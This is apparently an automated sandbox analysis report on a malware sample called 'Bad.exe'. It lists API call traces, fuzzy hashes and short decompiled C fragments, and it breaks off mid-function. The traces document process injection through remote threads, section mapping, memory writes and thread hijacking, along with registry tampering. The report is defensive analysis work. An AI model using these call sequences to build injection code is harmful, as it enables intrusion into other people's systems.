    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}
APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:B58623B61A3D254FB9FF47FF0A4A74C6
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:66839
Initial sample SHA 256:20CE262F54448C1424662B74706D81FAB421EB8F550C39A18CDB89DD9F15CB07
Initial sample name:Bad.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
